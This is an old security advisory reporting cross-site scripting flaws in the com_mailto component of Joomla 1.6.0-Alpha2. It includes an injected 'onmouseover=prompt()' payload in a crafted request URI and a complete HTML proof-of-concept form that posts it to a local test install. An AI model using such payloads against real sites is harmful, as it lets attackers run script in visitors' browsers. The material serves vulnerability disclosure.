|   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102  |  # Title:Joomla_1.6.0-Alpha2 XSS Vulnerabilities  # Date: 2010-05-02 # Author: mega-itec.com # Software Link: http://joomlacode.org/gf/download/frsrelease/11322/45252/Joomla_1.6.0-Alpha2-Full-Package.zip # Version: 1.6.0-alpha2 # Tested on: [relevant os] # CVE :  # Code :  [:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::] >> General Information Advisory/Exploit Title = Joomla_1.6.0-Alpha2 XSS Vulnerabilities  Author = mega-itec security team Contact = securite@mega-itec.com  [:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::] >> Product information Name = Joomla Vendor = Joomla Vendor Website = http://www.joomla.org/ Affected Version(s) = 1.6.0-Alpha2 [:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::] >> #1 Vulnerability Type = XSS ( POST ) mailto,subject,from,sender  Example URI =  option=com_mailto&task=user%2Elogin&32720689cad34365fbe10002f91e50a9=1&mailto=%F6"+onmouseover=prompt(406426661849)//&sender=mega-itec@mega-ite.com&from=mega-itec@mega-ite.com&subject=mega-itec@mega-ite.com&layout=default&tmpl=component&link=encode link with base 64 >> #2 html code exploit :  <form action="http://localhost/Joomla_1.6.0-Alpha2-Full-Package/index.php" name="mailtoForm" method="post"> <div style="padding: 10px;">  <div style="text-align:right">  <a href="javascript: void window.close()">  Close Window <img src="http://localhost/Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png" border="0" alt="" title="" /></a>  </div>  <h2>  E-mail this link to a friend. </h2>  <p>  E-mail to:  <br />  <input type="text" name="mailto" class="inputbox" size="25" value="�" onmouseover=prompt(406426661849)//"/>  </p>  <p>  Sender:  <br />  <input type="text" name="sender" class="inputbox" value="mega-itec@mega-ite.com" size="25" />  </p>  <p>  Your E-mail:  <br />  <input type="text" name="from" class="inputbox" value="mega-itec@mega-ite.com" size="25" />  </p>  <p>  Subject:  <br />  <input type="text" name="subject" class="inputbox" value="mega-itec@mega-ite.com" size="25" />  </p>  <p>  <button class="button" onclick="return submitbutton('send');">  Send </button>  <button class="button" onclick="window.close();return false;">  Cancel </button>  </p> </div>  <input type="hidden" name="layout" value="default" />  <input type="hidden" name="option" value="com_mailto" />  <input type="hidden" name="task" value="send" />  <input type="hidden" name="tmpl" value="component" />  <input type="hidden" name="link" value="encode you link with base64" />  <input type="hidden" name="4b42dc29b4b226460d1b510634e21864" value="1" /></form> [:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::] >> Misc mega-itec.com ::: mega-itec security team  [:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]  |